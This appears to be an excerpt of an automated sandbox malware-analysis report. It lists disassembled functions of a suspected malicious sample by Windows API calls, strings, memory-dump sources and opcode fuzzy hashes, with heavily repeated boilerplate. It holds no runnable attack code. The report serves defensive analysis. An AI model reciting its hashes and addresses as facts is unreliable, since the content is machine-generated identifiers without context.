                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: 7ca7d05d4d22fc8bea376edadeb1241799eb5db014fbc32bbf7cfea6bbfd6e20
                                    • Instruction ID: f9a6f148bed2905d903fd033020a2b0afa1fc84a8086ef2df685d13fed8bfda3
                                    • Opcode Fuzzy Hash: 7ca7d05d4d22fc8bea376edadeb1241799eb5db014fbc32bbf7cfea6bbfd6e20
                                    • Instruction Fuzzy Hash: 7501BBB5240748FFE710ABA5DC8DFAB3BACEB89711F004421FA05DB1A1CA749814DB20
                                    Function 00F79428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: 257b0f11ac5ea23babf4cab8675061c0de73b6f774525fd0fa87e33946f9d7d8
                                    • Instruction ID: 47ac01d6f93c8a4337f8f692b7b8b6ac5d50f1f8c054c733ed232d908b2b16de
                                    • Opcode Fuzzy Hash: 257b0f11ac5ea23babf4cab8675061c0de73b6f774525fd0fa87e33946f9d7d8
                                    • Instruction Fuzzy Hash: 10919D71E04219ABDF20DFA5CC44FAEBBB8EF45724F10C15AE519AB280D7B09905DFA1
                                    Function 00F86FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F87093
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F870A7
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F870C1
                                    • _wcscat.LIBCMT ref: 00F8711C
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F87133
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F87161
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: 4c87e96b472e4cc91d64dd8efbc92224e025daecdbff6cc5394c1655edc189e1
                                    • Instruction ID: b8488df2bf976a49080ae6753cea4fe870ec19341f489c0138f4dc976b2a0687
                                    • Opcode Fuzzy Hash: 4c87e96b472e4cc91d64dd8efbc92224e025daecdbff6cc5394c1655edc189e1
                                    • Instruction Fuzzy Hash: 64419371A04308AFDB21EF64CC85BEEB7A8EF08360F20056AF544E7192D775DD85AB60
                                    Function 00F7EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F63E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00F63EB6
                                      • Part of subcall function 00F63E91: Process32FirstW.KERNEL32(00000000,?), ref: 00F63EC4
                                      • Part of subcall function 00F63E91: CloseHandle.KERNEL32(00000000), ref: 00F63F8E
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7ECB8
                                    • GetLastError.KERNEL32 ref: 00F7ECCB
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7ECFA
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F7ED77
                                    • GetLastError.KERNEL32(00000000), ref: 00F7ED82
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7EDB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 36c03724c9da79dc2b705b2da6788ed1d93053102a435949132754914c11b997
                                    • Instruction ID: 7af2405bbfd3d744b6368abaaf06a7af929ead7aa2f7e89e4323e8b19b1c813e
                                    • Opcode Fuzzy Hash: 36c03724c9da79dc2b705b2da6788ed1d93053102a435949132754914c11b997
                                    • Instruction Fuzzy Hash: F741C3717042009FDB24EF14CC95FBDB7A5AF44714F18805AF9469F2C2DBB9A809EB92
                                    Function 00F63226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F632C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: d5f5fe9d9a06a4374d4390c6678e7ab7aeaf7b5dd182ef7a682b048995177bab
                                    • Instruction ID: 09ed37591809edc2c613161dbeb89cc6a65341e22cd9b969867be447f7866a03
                                    • Opcode Fuzzy Hash: d5f5fe9d9a06a4374d4390c6678e7ab7aeaf7b5dd182ef7a682b048995177bab
                                    • Instruction Fuzzy Hash: 0E11DD32A483567BE7015B55EC63DABB7ACDF19770F20002AF500961C1D6799B407AA5
                                    Function 00F78BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00F78BEC
                                    • CoInitialize.OLE32(00000000), ref: 00F78C19
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00F78D23
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F78E50
                                    • CoGetObject.OLE32(?,00000000,00F92C0C,?), ref: 00F78EA7
                                    • SetErrorMode.KERNEL32(00000000), ref: 00F78EBA
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F78F3A
                                    • VariantClear.OLEAUT32(?), ref: 00F78F4A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                                    • String ID:
                                    • API String ID: 2437601815-0
                                    • Opcode ID: 4d3dae05b577af8b61f1ae499f07996ad8686c6619a8b7d7d92f132867f9470e
                                    • Instruction ID: b1f9662f54ac2e4d40ddf4f66ce17e81c64ed7e3c02e8aacf06b7c0cf594e245
                                    • Opcode Fuzzy Hash: 4d3dae05b577af8b61f1ae499f07996ad8686c6619a8b7d7d92f132867f9470e
                                    • Instruction Fuzzy Hash: 2FC13571608305AFD700DF64C88896AB7E9BF88358F00896EF989DB251DB71ED06DB52
                                    Function 00F64534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F6454E
                                    • LoadStringW.USER32(00000000), ref: 00F64555
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6456B
                                    • LoadStringW.USER32(00000000), ref: 00F64572
                                    • _wprintf.LIBCMT ref: 00F64598
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F645B6
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F64593
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: 3c42dff34c9eabef397c2c9368478b8575d081f83a6f43ab87dd917bb735d6b4
                                    • Instruction ID: 19788f87dabf360bcbfb60d05f3f7834d60da8e2879cbb75f0311906d5868449
                                    • Opcode Fuzzy Hash: 3c42dff34c9eabef397c2c9368478b8575d081f83a6f43ab87dd917bb735d6b4
                                    • Instruction Fuzzy Hash: D10162F290020CBFE750A7A0DD89EF7776CEB08301F4005A5BB46E2051EA749E899B71
                                    Function 00F02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000), ref: 00F02ACF
                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000,000000FF), ref: 00F02B17
                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000), ref: 00F3C46A
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000), ref: 00F3C4D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 400a387869fdc6f6a13ca42773fd054813b5dafc9b43ac8c730f529483f276b1
                                    • Instruction ID: def9970a6dd83e49459a7d15b17f6aed1dc9566a5223a25dbc7d4267029dc7e3
                                    • Opcode Fuzzy Hash: 400a387869fdc6f6a13ca42773fd054813b5dafc9b43ac8c730f529483f276b1
                                    • Instruction Fuzzy Hash: 10412D31B086809EDBB59B28CD9CB7B7B92AF85334F54841DE047965E0CA3D9845F770
                                    Function 00F67368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F6737F
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F673B6
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00F673D2
                                    • _memmove.LIBCMT ref: 00F67420
                                    • _memmove.LIBCMT ref: 00F6743D
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00F6744C
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F67461
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F67480
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 256516436-0
                                    • Opcode ID: f400b52bc2d641d8da1a8b2b55764f47ea90d7461091a1057a313bd2ed90b60a
                                    • Instruction ID: 427fdb1318199af140d7e575c0b256e2d1dfb1f9b5be9abee7db047f82680131
                                    • Opcode Fuzzy Hash: f400b52bc2d641d8da1a8b2b55764f47ea90d7461091a1057a313bd2ed90b60a
                                    • Instruction Fuzzy Hash: C0317032904219EFCF10EF64DD89AAFBB78FF45710B1441B5F904AB246DB349A14EBA4
                                    Function 00F86442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00F8645A
                                    • GetDC.USER32(00000000), ref: 00F86462
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F8646D
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F86479
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F864B5
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F864C6
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F89299,?,?,000000FF,00000000,?,000000FF,?), ref: 00F86500
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F86520
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 94b5ee0dc5a5f4e89bdee98c851fd32194c55a9e2cfd732788b20f85a8160230
                                    • Instruction ID: e1616b1fd0bcd88c33ad463c4d550ee667e5daca484b596075e14e550d386787
                                    • Opcode Fuzzy Hash: 94b5ee0dc5a5f4e89bdee98c851fd32194c55a9e2cfd732788b20f85a8160230
                                    • Instruction Fuzzy Hash: 96317872200218AFEB109F10CC8AFFA3BA9EF09765F080065FE08DA2A1D6759841DB64
                                    Function 00F5C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: e700c72bf7ac7c0f2b823703b7cb1ae13dfd0c29ec8021b4cca3116784e6778d
                                    • Instruction ID: a4301671f2a202ea4b2445a2c873f6468a299b9ac02d9439d1fa4878cb1f3080
                                    • Opcode Fuzzy Hash: e700c72bf7ac7c0f2b823703b7cb1ae13dfd0c29ec8021b4cca3116784e6778d
                                    • Instruction Fuzzy Hash: 2621F562A01715BFE650A5219C46FAF379CAF213A6B040020FF07D66C2E715DE19B6E6
                                    Function 00F6D7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • CoInitialize.OLE32(00000000), ref: 00F6D855
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F6D8E8
                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F6D8FC
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F6D9B7
                                    • _memset.LIBCMT ref: 00F6DA4C
                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F6DA88
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F6DAAB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 3008154123-0
                                    • Opcode ID: 2b5da90ea6f9cd023ee7122bd95f3afdab520039bc1cd90dfb68c7c8813cabe0
                                    • Instruction ID: ea1c45dd3cb721944488c500c0d6cc41dfca6acfa327a258b77dd84c3c0968c7
                                    • Opcode Fuzzy Hash: 2b5da90ea6f9cd023ee7122bd95f3afdab520039bc1cd90dfb68c7c8813cabe0
                                    • Instruction Fuzzy Hash: 4AB1FC75A00109AFDB04DFA4CC89DAEBBB9FF48314B148469F905EB251DB34ED45EB50
                                    Function 00F01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4b9723586f81e12326a4e62937f6dcbf8133e559804ff6ae2a47e29ef9507218
                                    • Instruction ID: a39551c4fcb08a83715d772a4a0433b1eed191304371b6e10b1102836d9e94b4
                                    • Opcode Fuzzy Hash: 4b9723586f81e12326a4e62937f6dcbf8133e559804ff6ae2a47e29ef9507218
                                    • Instruction Fuzzy Hash: 57717035900109EFCB14CF98CC89ABEBB75FF86320F248159F915AA291C734AA51EB60
                                    Function 00F8B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(01983AE0), ref: 00F8B6A5
                                    • IsWindowEnabled.USER32(01983AE0), ref: 00F8B6B1
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F8B795
                                    • SendMessageW.USER32(01983AE0,000000B0,?,?), ref: 00F8B7CC
                                    • IsDlgButtonChecked.USER32(?,?), ref: 00F8B809
                                    • GetWindowLongW.USER32(01983AE0,000000EC), ref: 00F8B82B
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F8B843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: 08d2b9b448a19e281450f346b076399881bcb4b54506dd278a8164163b22dcef
                                    • Instruction ID: acd161f042fdecc303b8f989729ef00ca07461e5d6596d5df95429bc6918f2b1
                                    • Opcode Fuzzy Hash: 08d2b9b448a19e281450f346b076399881bcb4b54506dd278a8164163b22dcef
                                    • Instruction Fuzzy Hash: 29719D34A04305AFDB20AF64C895FFE7BB9FF89320F1444A9E946972A1D731A841FB54
                                    Function 00F786D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON
                                    Download Yara Rule
                                    APIs
